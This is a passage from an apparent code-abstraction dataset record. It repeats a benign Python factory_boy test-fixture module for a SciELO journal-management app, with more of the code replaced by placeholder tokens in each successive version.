cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n \"\"\"\n ``issue`` must be provided\n \"\"\"\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = 
models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n <docstring token>\n FACTORY_FOR = models.IssueTitle\n language = factory.SubFactory(LanguageFactory)\n title = u'Bla'\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = 
factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueTitleFactory(factory.Factory):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n 
journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueFactory(factory.Factory):\n FACTORY_FOR = models.Issue\n total_documents = 16\n number = factory.Sequence(lambda n: '%s' % n)\n volume = factory.Sequence(lambda n: '%s' % n)\n is_trashed = False\n publication_start_month = 9\n publication_end_month = 11\n publication_year = 2012\n is_marked_up = False\n suppl_text = '1'\n journal = factory.SubFactory(JournalFactory)\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass 
IssueFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n @classmethod\n def _prepare(cls, create, **kwargs):\n section = SectionFactory()\n issue = super(IssueFactory, cls)._prepare(create, **kwargs)\n issue.section.add(section)\n return issue\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass IssueFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <function token>\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda 
n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UserProfileFactory(factory.Factory):\n FACTORY_FOR = models.UserProfile\n user = factory.SubFactory(UserFactory)\n email_notifications = True\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass 
ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass UserProfileFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionTitleFactory(factory.Factory):\n FACTORY_FOR = models.SectionTitle\n title = u'Artigos Originais'\n language = factory.SubFactory(LanguageFactory)\n section = factory.SubFactory(SectionFactory)\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = 
factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass SectionTitleFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.RegularPressRelease\n issue = 
factory.SubFactory(IssueFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = factory.SubFactory(LanguageFactory)\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n title = u'Yeah, this issue is amazing!'\n content = u'Want to read more about...'\n\n\nclass PressReleaseArticleFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseArticle\n press_release = factory.SubFactory(RegularPressReleaseFactory)\n article_pid = factory.Sequence(lambda n: 'S0102-311X201300030000%s' % n)\n\n\nclass ArticleFactory(factory.Factory):\n FACTORY_FOR = models.Article\n xml = SAMPLE_XML\n is_aop = False\n domain_key = factory.Sequence(lambda n: \n 'revista-de-saude-publica_48_2_2014_216_a_224_none_none_%s' % n)\n journal_title = u'Revista de Saúde Pública'\n issn_ppub = u'0034-8910'\n issn_epub = u'1518-8787'\n xml_version = u'sps-1.2'\n article_type = u'research-article'\n doi = u'10.1590/S0034-8910.2014048004965'\n\n\nclass ArticleAssetFactory(factory.Factory):\n FACTORY_FOR = models.ArticleAsset\n article = factory.SubFactory(ArticleFactory)\n file = File(SAMPLE_TIFF_IMAGE)\n owner = u'SciELO'\n use_license = u'Creative Commons - BY'\n", "<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n<class token>\n\n\nclass RegularPressReleaseFactory(factory.Factory):\n <assignment token>\n <assignment token>\n <assignment token>\n\n\nclass AheadPressReleaseFactory(factory.Factory):\n FACTORY_FOR = models.AheadPressRelease\n journal = factory.SubFactory(JournalFactory)\n doi = factory.Sequence(lambda n: \n 'http://dx.doi.org/10.4415/ANN_12_01_%s' % n)\n\n\nclass PressReleaseTranslationFactory(factory.Factory):\n FACTORY_FOR = models.PressReleaseTranslation\n language = 